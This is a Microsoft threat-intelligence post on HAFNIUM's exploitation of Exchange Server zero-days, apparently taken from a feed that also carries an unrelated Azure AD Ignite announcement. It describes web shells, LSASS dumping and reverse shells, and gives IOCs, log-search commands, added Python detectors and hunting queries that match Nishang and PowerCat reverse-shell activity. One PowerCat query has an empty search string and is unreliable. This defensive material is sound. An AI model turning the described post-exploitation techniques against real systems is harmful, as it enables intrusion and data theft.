HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.

In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments.

HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

Technical details

Microsoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.

CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Attack details

After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:

Following web shell deployment, HAFNIUM operators performed the following post-exploitation activity:

  • Using Procdump to dump the LSASS process memory:

  • Using 7-Zip to compress stolen data into ZIP files for exfiltration:

  • Adding and using Exchange PowerShell snap-ins to export mailbox data:

  • Using the Nishang Invoke-PowerShellTcpOneLine reverse shell:

  • Downloading PowerCat from GitHub, then using it to open a connection to a remote server:

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.

Our blog, Defending Exchange servers under attack, offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog Web shell attacks continue to rise.

Can I determine if I have been compromised by this activity?

The sections below provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.

Check patch levels of Exchange Server

The Microsoft Exchange Server team has published a blog post on these new Security Updates providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.

Scan Exchange log files for indicators of compromise

  • CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs:
    • These logs are located in the following directory: %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy
    • Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern ServerInfo~*/*
      • Here is an example PowerShell command to find these log entries:

Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName | Where-Object { $_.AuthenticatedUser -eq '' -and $_.AnchorMailbox -like 'ServerInfo~*/*' } | Select-Object DateTime, AnchorMailbox

    • If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken.
      • These logs are located in the %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging directory.
  • CVE-2021-26858 exploitation can be detected via the Exchange log files:
    • C:\Program Files\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog
    • Files should only be downloaded to the %PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp directory
      • In case of exploitation, files are downloaded to other directories (UNC or local paths)
    • Windows command to search for potential exploitation:

findstr /snip /c:"Download failed and temporary file" "%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log"

  • CVE-2021-26857 exploitation can be detected via the Windows Application event logs
    • Exploitation of this deserialization bug will create Application events with the following properties:
      • Source: MSExchange Unified Messaging
      • EntryType: Error
      • Event Message Contains: System.InvalidCastException
    • Following is a PowerShell command to query the Application Event Log for these log entries:

Get-EventLog -LogName Application -Source "MSExchange Unified Messaging" -EntryType Error | Where-Object { $_.Message -like "*System.InvalidCastException*" }

  • CVE-2021-27065 exploitation can be detected via the following Exchange log files:
    • C:\Program Files\Microsoft\Exchange Server\V15\Logging\ECP\Server
    • All Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid URIs.
    • Following is a PowerShell command to search for potential exploitation:

Select-String -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log" -Pattern 'Set-.+VirtualDirectory'
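The same two log checks can be run offline, for instance on log files copied off a server during an investigation. The Python below is an added example, not one of Microsoft's scripts: the HttpProxy sample is a constructed CSV carrying only the three columns the post names (DateTime, AuthenticatedUser, AnchorMailbox), and the ECP Server sample lines use a simplified constructed layout (timestamp,user,command), so the SET_VDIR_RE and URL_PARAM_RE parsing is an assumption about that layout rather than the real log format.

```python
"""Offline scan of Exchange log text for the HttpProxy and ECP indicators above.

Added example, not Microsoft's script. SAMPLE_HTTPPROXY_LOG is a constructed CSV
with only the columns the post names; SAMPLE_ECP_LINES use a simplified constructed
layout (timestamp,user,command) that real ECP Server logs do not match exactly.
"""
import csv
import fnmatch
import io
import re
from urllib.parse import urlparse

# Constructed HttpProxy-style CSV: one authenticated request, one unauthenticated
# request whose AnchorMailbox carries the ServerInfo~ pattern, one normal SID anchor.
SAMPLE_HTTPPROXY_LOG = (
    "DateTime,AuthenticatedUser,AnchorMailbox\n"
    "2021-03-02T10:00:01.000Z,CONTOSO\\alice,alice@contoso.example\n"
    "2021-03-02T10:00:07.000Z,,ServerInfo~a]@contoso.example/autodiscover/autodiscover.xml\n"
    "2021-03-02T10:00:09.000Z,CONTOSO\\bob,Sid~S-1-5-21-1-2-3-1001\n"
)


def find_unauthenticated_serverinfo(csv_text):
    """Rows with an empty AuthenticatedUser and an AnchorMailbox matching
    ServerInfo~*/*. fnmatch gives the same wildcard semantics as PowerShell -like;
    both sides are lower-cased because -like is case-insensitive."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        user = (row.get("AuthenticatedUser") or "").strip()
        anchor = row.get("AnchorMailbox") or ""
        if user == "" and fnmatch.fnmatchcase(anchor.lower(), "serverinfo~*/*"):
            hits.append((row["DateTime"], anchor))
    return hits


# Constructed ECP Server-style lines: a benign URL change, a value that is not a
# URI at all (a local path), a value carrying script, and a read-only cmdlet.
SAMPLE_ECP_LINES = [
    "2021-03-02T10:05:00Z,CONTOSO\\admin,Set-OabVirtualDirectory -Identity 'OAB (Default Web Site)' -ExternalUrl 'https://mail.contoso.example/OAB'",
    "2021-03-02T10:05:30Z,,Set-OabVirtualDirectory -Identity 'OAB (Default Web Site)' -ExternalUrl 'C:\\inetpub\\wwwroot\\aspnet_client\\x.aspx'",
    "2021-03-02T10:05:45Z,,Set-OabVirtualDirectory -Identity 'OAB (Default Web Site)' -ExternalUrl 'http://f/<script>'",
    "2021-03-02T10:06:00Z,CONTOSO\\admin,Get-OabVirtualDirectory",
]

# Assumed layout: the cmdlet and its parameters appear verbatim on the line.
SET_VDIR_RE = re.compile(r"Set-\w+VirtualDirectory\b", re.IGNORECASE)
URL_PARAM_RE = re.compile(r"-(InternalUrl|ExternalUrl)\s+['\"]?([^'\"\s]*)", re.IGNORECASE)


def is_valid_uri(value):
    """The post's rule: InternalUrl/ExternalUrl must be plain http(s) URIs."""
    parsed = urlparse(value)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)


def suspicious_vdir_entries(lines):
    """Set-*VirtualDirectory invocations whose URL parameters are not valid URIs
    or whose properties contain script. Returns (line, reason) pairs."""
    flagged = []
    for line in lines:
        if not SET_VDIR_RE.search(line):
            continue
        reasons = []
        if "<script" in line.lower():
            reasons.append("VirtualDirectory property contains script")
        for name, value in URL_PARAM_RE.findall(line):
            if not is_valid_uri(value):
                reasons.append(f"{name} is not a valid URI: {value!r}")
        if reasons:
            flagged.append((line, "; ".join(reasons)))
    return flagged


if __name__ == "__main__":
    for when, anchor in find_unauthenticated_serverinfo(SAMPLE_HTTPPROXY_LOG):
        print("unauthenticated ServerInfo anchor:", when, anchor)
    for line, reason in suspicious_vdir_entries(SAMPLE_ECP_LINES):
        print("suspicious VirtualDirectory change:", reason)
```

Against real files, feed the HttpProxy CSV text of each .log file to find_unauthenticated_serverinfo and the ECP Server lines to suspicious_vdir_entries after adjusting the two regular expressions to the actual line layout; a hit on either check is a lead to pull the application-specific logs the post points to, not proof of compromise on its own.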

Host IOCs

Web shell hashes

  • b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
  • 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
  • 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
  • 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
  • 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
  • 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
  • 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
  • 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

We observed web shells in the following paths:

  • C:\inetpub\wwwroot\aspnet_client\
  • C:\inetpub\wwwroot\aspnet_client\system_web\
  • In Microsoft Exchange Server installation paths such as:
    • %PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
    • C:\Exchange\FrontEnd\HttpProxy\owa\auth\

The web shells we detected had the following file names:

  • web.aspx
  • help.aspx
  • document.aspx
  • errorEE.aspx
  • errorEEE.aspx
  • errorEW.aspx
  • errorFF.aspx
  • healthcheck.aspx
  • aspnet_www.aspx
  • aspnet_client.aspx
  • xx.aspx
  • shell.aspx
  • aspnet_iisstart.aspx
  • one.aspx

Check for suspicious .zip, .rar, and .7z files in C:\ProgramData\, which may indicate possible data exfiltration.

Customers should monitor these paths for LSASS dumps:

  • C:\windows\temp\
  • C:\root\
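One way to turn the host indicators above into a sweep, as an added example rather than Microsoft's tooling: hash every file under the listed web shell directories against the SHA-256 set, flag files whose names match the observed web shell names, and list archives sitting directly in C:\ProgramData. The hash set, directory list and file names are the post's; the default Exchange install path is assumed, and demo() builds a constructed temporary tree with placeholder files so the sweep can be exercised without a compromised server.

```python
"""Sweep host paths for the HAFNIUM web shell indicators listed above.

Added example, not Microsoft's tooling. Hash set, directory list and file names
come from the post; demo() builds a constructed tree of placeholder files.
"""
import hashlib
import tempfile
from pathlib import Path

WEBSHELL_SHA256 = {
    "b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0",
    "097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e",
    "2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1",
    "65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5",
    "511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1",
    "4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea",
    "811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d",
    "1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944",
}
WEBSHELL_NAMES = {
    "web.aspx", "help.aspx", "document.aspx", "erroree.aspx", "erroreee.aspx",
    "errorew.aspx", "errorff.aspx", "healthcheck.aspx", "aspnet_www.aspx",
    "aspnet_client.aspx", "xx.aspx", "shell.aspx", "aspnet_iisstart.aspx", "one.aspx",
}
ARCHIVE_SUFFIXES = {".zip", ".rar", ".7z"}
# Web shell directories from the post (default install path assumed for %PROGRAMFILES%).
WEBSHELL_ROOTS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\Exchange\FrontEnd\HttpProxy\owa\auth",
]
ARCHIVE_ROOTS = [r"C:\ProgramData"]


def sha256_of(path, chunk=1 << 20):
    """Stream the file so large archives do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(webshell_roots=WEBSHELL_ROOTS, archive_roots=ARCHIVE_ROOTS):
    """Return (path, [reasons]) findings. A hash match is definitive; a name match
    is only a lead, because names like help.aspx are generic; archives are checked
    one level deep in the staging directory, not recursively, to limit noise."""
    findings = []
    for root in map(Path, webshell_roots):
        if not root.is_dir():
            continue
        for p in root.rglob("*"):
            if not p.is_file():
                continue
            reasons = []
            if sha256_of(p) in WEBSHELL_SHA256:
                reasons.append("SHA-256 matches a HAFNIUM web shell hash")
            if p.name.lower() in WEBSHELL_NAMES:
                reasons.append("file name matches an observed web shell name (verify content)")
            if reasons:
                findings.append((str(p), reasons))
    for root in map(Path, archive_roots):
        if not root.is_dir():
            continue
        for p in root.iterdir():
            if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
                findings.append((str(p), ["archive in staging directory, possible exfiltration"]))
    return findings


def demo():
    """Sweep a constructed tree: one suspicious name, one benign page, one archive."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp) / "aspnet_client"
        web.mkdir()
        (web / "help.aspx").write_text("<!-- constructed placeholder, not a web shell -->")
        (web / "index.aspx").write_text("<!-- benign constructed page -->")
        data = Path(tmp) / "ProgramData"
        data.mkdir()
        (data / "export.zip").write_bytes(b"")
        return {
            "findings": sweep([web], [data]),
            "empty_file_sha256": sha256_of(data / "export.zip"),
        }


if __name__ == "__main__":
    for path, reasons in sweep():
        print(path, "->", "; ".join(reasons))
```

Run on a real server, sweep() with its defaults walks the three web shell directories and the top level of C:\ProgramData; add the web root of any non-default Exchange install to WEBSHELL_ROOTS, and treat a name-only match as something to read, not something to delete.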

Many of the following detections are for post-breach techniques used by HAFNIUM. While they help detect some of the specific attacks Microsoft has observed, it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, and CVE-2021-26858.

Microsoft Defender Antivirus detections

Please note that some of these detections are generic detections and not unique to this campaign or these exploits.

  • Exploit:Script/Exmann.A!dha
  • Behavior:Win32/Exmann.A
  • Backdoor:ASP/SecChecker.A
  • Backdoor:JS/Webshell (not unique)
  • Trojan:JS/Chopper!dha (not unique)
  • Behavior:Win32/DumpLsass.A!attk (not unique)
  • Backdoor:HTML/TwoFaceVar.B (not unique)

Microsoft Defender for Endpoint detections

  • Suspicious Exchange UM process creation
  • Suspicious Exchange UM file creation
  • Possible web shell installation (not unique)
  • Process memory dump (not unique)

Azure Sentinel detections

Advanced hunting queries

To locate possible exploitation activity related to the contents of this blog, you can run the following advanced hunting queries via Microsoft Defender for Endpoint and Azure Sentinel:

Microsoft Defender for Endpoint advanced hunting queries

Microsoft 365 Defender customers can find related hunting queries below or at this GitHub location:

Additional queries and information are available via the Threat Analytics portal for Microsoft Defender customers.

UMWorkerProcess.exe in Exchange creating abnormal content

Look for Microsoft Exchange Server’s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of the CVE-2021-26858 vulnerability:

DeviceFileEvents
| where InitiatingProcessFileName == "UMWorkerProcess.exe"
| where FileName != "CacheCleanup.bin"
| where FileName !endswith ".txt"
| where FileName !endswith ".LOG"
| where FileName !endswith ".cfg"
| where FileName != "cleanup.bin"

UMWorkerProcess.exe spawning

Look for Microsoft Exchange Server’s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of the CVE-2021-26857 vulnerability:

DeviceProcessEvents
| where InitiatingProcessFileName == "UMWorkerProcess.exe"
| where FileName != "wermgr.exe"
| where FileName != "WerFault.exe"

Please note that excessive spawning of wermgr.exe and WerFault.exe could itself be an indicator of compromise, because the service crashes during deserialization.

Azure Sentinel advanced hunting queries

Azure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location:

Look for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:

SecurityEvent
| where EventID == 4688
| where Process has_any ("powershell.exe", "PowerShell_ISE.exe")
| where CommandLine has "$client = New-Object System.Net.Sockets.TCPClient"

Look for downloads of PowerCat in cmd and PowerShell command line logging in Windows Event Logs:

SecurityEvent
| where EventID == 4688
| where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")
| where CommandLine has ""

Look for the Exchange PowerShell snap-in being loaded. This can be used to export mailbox data; subsequent command lines should be inspected to verify usage:

SecurityEvent
| where EventID == 4688
| where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")
| where isnotempty(CommandLine)
| where CommandLine contains "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin"
| summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine
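The hunting logic in this section, both the Defender for Endpoint queries and the Azure Sentinel queries, rendered in Python as an added example so the filter rules can be checked offline against exported events; this is not the post's KQL and not a Microsoft tool. Field names (InitiatingProcessFileName, FileName, EventID, Process, CommandLine, TimeGenerated, Computer, Account) follow the queries, and the event records are constructed. One point the KQL hides: ==, !endswith, has and contains are all case-insensitive in KQL, so a reimplementation has to lower-case before comparing (otherwise a file named trace.LOG would slip past an ".log" exclusion), and the term-matching has operator is approximated here by a substring test.

```python
"""Python rendition of the hunting queries above, for checking the rules offline.

Added example, not the post's KQL. Field names follow the queries; the sample
events are constructed. KQL string operators are case-insensitive, so every
comparison lower-cases first; `has` is approximated by substring search.
"""

UM_PROCESS = "umworkerprocess.exe"
UM_EXPECTED_FILES = {"cachecleanup.bin", "cleanup.bin"}
UM_EXPECTED_SUFFIXES = (".txt", ".log", ".cfg")
UM_EXPECTED_CHILDREN = {"wermgr.exe", "werfault.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe"}
COMMAND_HOSTS = POWERSHELL_HOSTS | {"cmd.exe"}
NISHANG_MARKER = "$client = new-object system.net.sockets.tcpclient"
EXCHANGE_SNAPIN = "add-pssnapin microsoft.exchange.powershell.snapin"


def _basename(path):
    """SecurityEvent.Process carries a full path; has_any matches the file name in it."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def um_abnormal_file_events(events):
    """DeviceFileEvents rule: UMWorkerProcess.exe creating anything outside its
    expected files (CVE-2021-26858 indicator)."""
    hits = []
    for e in events:
        if e.get("InitiatingProcessFileName", "").lower() != UM_PROCESS:
            continue
        name = e.get("FileName", "").lower()
        if name in UM_EXPECTED_FILES or name.endswith(UM_EXPECTED_SUFFIXES):
            continue
        hits.append(e)
    return hits


def um_abnormal_child_processes(events):
    """DeviceProcessEvents rule: UMWorkerProcess.exe spawning anything other than
    the Windows Error Reporting helpers (CVE-2021-26857 indicator)."""
    return [
        e for e in events
        if e.get("InitiatingProcessFileName", "").lower() == UM_PROCESS
        and e.get("FileName", "").lower() not in UM_EXPECTED_CHILDREN
    ]


def _process_creations(events, hosts):
    for e in events:
        if e.get("EventID") == 4688 and _basename(e.get("Process", "")) in hosts:
            yield e


def nishang_reverse_shell_events(events):
    """SecurityEvent rule: PowerShell process creation whose command line carries
    the Invoke-PowerShellTcpOneLine socket setup string."""
    return [
        e for e in _process_creations(events, POWERSHELL_HOSTS)
        if NISHANG_MARKER in e.get("CommandLine", "").lower()
    ]


def exchange_snapin_summary(events):
    """SecurityEvent rule with its summarize step: first and last time each
    (Computer, Account, CommandLine) loaded the Exchange PowerShell snap-in."""
    summary = {}
    for e in _process_creations(events, COMMAND_HOSTS):
        cmd = e.get("CommandLine", "")
        if not cmd or EXCHANGE_SNAPIN not in cmd.lower():
            continue
        key = (e["Computer"], e["Account"], cmd)
        t = e["TimeGenerated"]
        first, last = summary.get(key, (t, t))
        summary[key] = (min(first, t), max(last, t))  # ISO timestamps sort lexically
    return summary


# Constructed sample events. The .LOG case checks the case-insensitivity handling.
SAMPLE_FILE_EVENTS = [
    {"InitiatingProcessFileName": "UMWorkerProcess.exe", "FileName": "CacheCleanup.bin"},
    {"InitiatingProcessFileName": "UMWorkerProcess.exe", "FileName": "trace.LOG"},
    {"InitiatingProcessFileName": "UMWorkerProcess.exe", "FileName": "greeting.txt"},
    {"InitiatingProcessFileName": "UMWorkerProcess.exe", "FileName": "help.aspx"},
    {"InitiatingProcessFileName": "w3wp.exe", "FileName": "help.aspx"},
]
SAMPLE_PROCESS_EVENTS = [
    {"InitiatingProcessFileName": "UMWorkerProcess.exe", "FileName": "WerFault.exe"},
    {"InitiatingProcessFileName": "UMWorkerProcess.exe", "FileName": "cmd.exe"},
]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SNAPIN_CMD = 'powershell -c "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin; Get-Mailbox"'
SAMPLE_SECURITY_EVENTS = [
    {"EventID": 4688, "TimeGenerated": "2021-03-02T10:10:00Z", "Computer": "EXCH01", "Account": r"CONTOSO\svc",
     "Process": PS, "CommandLine": 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient"'},
    {"EventID": 4688, "TimeGenerated": "2021-03-02T10:12:00Z", "Computer": "EXCH01", "Account": r"CONTOSO\svc",
     "Process": PS, "CommandLine": SNAPIN_CMD},
    {"EventID": 4688, "TimeGenerated": "2021-03-02T10:20:00Z", "Computer": "EXCH01", "Account": r"CONTOSO\svc",
     "Process": PS, "CommandLine": SNAPIN_CMD},
    {"EventID": 4688, "TimeGenerated": "2021-03-02T10:30:00Z", "Computer": "EXCH01", "Account": r"CONTOSO\alice",
     "Process": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 4624, "TimeGenerated": "2021-03-02T10:31:00Z", "Computer": "EXCH01", "Account": r"CONTOSO\alice",
     "Process": "", "CommandLine": ""},
]
```

The snap-in summary intentionally groups on the full command line, as the KQL does: a legitimate administrator and an intruder may both load the snap-in, so the command lines behind each (Computer, Account) pair are what need reading.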


The post HAFNIUM targeting Exchange Servers with 0-day exploits appeared first on Microsoft Security.

Identity at Microsoft Ignite: Strengthening Zero Trust defenses in the era of hybrid work

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

We’re now a year into our new reality, and two trends stand out. First, people need even more flexibility as we work, learn, and collaborate in a world without perimeters. And second, bad actors are getting even more sophisticated. They’re adding new attack vectors and combining them in new creative ways, as we just saw with Solorigate.

In January, I shared our top five identity priorities for 2021 to help you strengthen security and accelerate your transition to the new hybrid work era. More than ever, organizations need to strengthen their defenses to give employees, partners, and customers the flexibility to work from anywhere using apps that live inside and outside the traditional corporate network perimeter. That’s why Zero Trust, a security strategy that combines maximum flexibility with maximum security, is so crucial.

For IT pros and security professionals, the implementation of Zero Trust should be simple and straightforward. For users, it should never get in the way, and it should fit into familiar workflows and habits. This week, on the virtual Microsoft Ignite stage, I’m announcing several Azure Active Directory (Azure AD) innovations that will help make life easier for you and your employees now—and help you stay prepared for whatever comes next.

Give your employees a secure and seamless user experience

As part of our commitment to making security as seamless as possible, passwordless authentication is now generally available for organizations to deploy at scale. Your IT admins, employees, and partners can benefit from increased security and simplicity. We’ve made it easy to roll out passwordless at scale with expanded policies that define which authentication methods specific users or groups can use. New reporting capabilities allow you to see the usage and adoption of passwordless authentication methods across your organization. To help you simplify and secure remote access, we’ve also released the preview of Temporary Access Pass, a time-limited code used to set up and recover a passwordless credential.

Microsoft already has more than 200 million passwordless users across our consumer and enterprise services. We’re excited to see even more customers adopting passwordless each day. Axiata Group is the first company in Southeast Asia to eliminate passwords for their employees. They went passwordless using Windows Hello for Business and the Microsoft Authenticator app. Abid Adam, group chief risk and compliance officer at Axiata Group said, “Rather than make their lives miserable with long passwords that create risk for the organization, we turned to biometrics. Now with Windows Hello, security is baked into our ecosystem, and we have better access to information with greater barriers to bad actors. It’s a win-win for our security team, our employees, and the company.” Similarly, in Europe, Umeå municipality wanted to strengthen security and eliminate the use of passwords. With help from Onevinn and Yubico partners, they were able to roll out their first passwordless deployment in less than 10 days. Watch my interview on Microsoft Mechanics to see passwordless in action.

Going passwordless not only simplifies the user experience but also strengthens your security posture. And thanks to Azure AD Conditional Access, you no longer need to request multifactor authentication every time someone accesses an app that touches sensitive data. Instead, you can step up authentication based on what the user is trying to do within the app—for example, downloading a highly confidential document. With Azure AD Conditional Access authentication context, now in preview, you can move away from one-size-fits-all security and adopt more granular policies that protect resources with the right level of controls based on user actions or the data they are trying to access.


  • General availability of passwordless authentication.
  • Preview of Temporary Access Pass.
  • Preview of Azure AD Conditional Access authentication context.

Secure access to all apps

Most of you manage multi-cloud environments. Your developers are building apps that are distributed across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform. They need to sign in to each cloud with only one set of credentials. So that you can quickly configure single sign-on (SSO) and user provisioning, we’re constantly expanding the Azure AD app gallery with as many pre-integrations as possible—even with our competitors.

The AWS Single Sign-On app is now pre-integrated with Azure AD and available in the app gallery. This integration lets you connect Azure AD to AWS SSO, a cloud-based service that simplifies SSO access across multiple AWS accounts and resources. You can centralize management of user access to AWS, while your employees can gain access using their Azure AD credentials.

During the past year, many organizations have relied on our Azure AD App Proxy service to help employees secure remote access to on-premises apps. Usage grew more than 100 percent last year, helping organizations move away from VPN solutions. Today, we’re adding two new features to help you get the most out of App Proxy. First, native support for header-based authentication with App Proxy is now generally available. Second, traffic optimization by region for App Proxy is now in preview. This new feature lets you designate which region your App Proxy service connector group should use and select the same region as your apps. This new feature helps reduce latency and improve performance.

To protect your legacy, on-premises applications, we’re expanding the list of our secure hybrid access partnerships to include Datawiza, Perimeter 81, Silverfort, and Strata. In addition to connecting your on-premises apps, partners like Datawiza, Strata, and Silverfort can help you discover and prioritize apps and resources to migrate to Azure AD. “Silverfort is thrilled to be able to collaborate with Azure AD to enable unified secure access to legacy, on-premises apps, and resources,” said Ron Rasin, vice president of product and strategic alliances at Silverfort. “Identity has become the primary security control plane making it critical that organizations can discover, prioritize, and migrate the apps and resources to a central identity solution like Azure AD.”

Solorigate taught us that in many cases, cloud environments are more secure than on-premises. To strengthen your defenses, it’s critical to minimize your on-premises footprint and manage all your apps from the cloud. The process of discovering applications across different environments and prioritizing them for cloud modernization can be daunting, however. To make it easier, we’re announcing the general availability of Active Directory Federation Services (AD FS) activity and insights report. This report assesses all AD FS applications for compatibility with Azure AD, checks for any issues, and provides guidance on preparing individual applications for migration to Azure AD.


  • AWS Single Sign-On now available in Azure AD app gallery.
  • General availability of AD FS activity and insights report.
  • New secure hybrid access partnerships with Datawiza, Perimeter 81, Silverfort, and Strata.
  • General availability of Azure AD App Proxy support for header-based authentication apps.
  • Preview of Azure AD App Proxy support for traffic optimization by region.

Secure your customers and partners

A strong Zero Trust approach requires that we treat access requests from customers, partners, and vendors just like requests from employees: verify every request, allow users to access the data they need only when they need it, and don’t let guests overstay their welcome. With Azure AD, you can apply consistent access policies to all types of external users.

Generally available starting this month, Azure AD External Identities is a set of capabilities for securing and managing identity and access for customers and partners. Self-service sign-up user flows in Azure AD apps make it easy to create, manage, and customize onboarding experiences for external users, with little to no application code. You can integrate support for sign-in using Google and Facebook IDs and extend the flow with powerful API connectors. Using Azure AD Identity Protection, you can protect your business-to-business (B2B) and business-to-consumer (B2C) apps and users with adaptive, machine learning–driven security.

With automated guest access reviews for Microsoft Teams and Microsoft 365 groups, now generally available, Azure AD will prompt you to review and update access permissions for all guests added to new or existing Teams or groups on a regular schedule. The process of cleaning up access to sensitive resources that your guest users no longer need will become less manual—and less neglected.


  • General availability of Azure AD External Identities.
  • General availability of Azure AD access reviews for all guests in Teams and Microsoft 365 groups.

The future of identity is bright

While 2020 was a challenging year, we have much to look forward to in 2021, with innovations that will deliver more security, transparency, and privacy for users. Last Microsoft Ignite, I talked about verifiable credentials and our commitment to empowering every person to own their own identity thanks to decentralized identifiers. I’m happy to share that Azure AD verifiable credentials is entering preview in just a few weeks. Developers will get an SDK, with quick-start guides, for building apps that request and verify credentials, just like they do with usernames and passwords. I’m also excited to announce that we are partnering with some of the leading ID verification partners—Acuant, Au10tix, Idemia, Jumio, Socure, Onfido, Vu Security—to improve verifiability and secure information exchange.

Verifiable credentials let organizations confirm information about someone—like their education and professional certifications—without collecting and storing their personal data. This will revolutionize the way we grant permissions to access our information. Organizations will be able to issue digital versions of a variety of credentials such as physical badges, loyalty cards, and government-issued paper documents based on open standards. Because the digital information is verified by a known party, it’s more trustworthy, and verification will only take minutes instead of days or weeks.

Individuals get more control over what information they share with whom, and they can restrict access to that shared information at any time. They only have to verify a credential once to use it everywhere. To manage their credentials, they can use the Microsoft Authenticator app and other wallet apps that support open standards, such as the pilot application built by Keio University for their students.


  • Preview of Azure AD verifiable credentials.

And finally, I’m happy to share that we’re releasing a new Microsoft Identity and Access Administrator Certification, which you can find at the Microsoft Security Resources portal. This training helps admins design, implement, and operate Azure AD as the organization’s security control plane.


  • Release of the Microsoft Identity and Access Administrator Certification.

The new features announced at Microsoft Ignite will make it easier to provide seamless user experiences in the hybrid workplace and to strengthen your defenses against attacks that are increasingly sophisticated. As you try these new tools, please send us your feedback so we can continue to build advancements that help you keep your employees secure, connected, and productive.

Let’s make 2021 the Year of Passwordless!

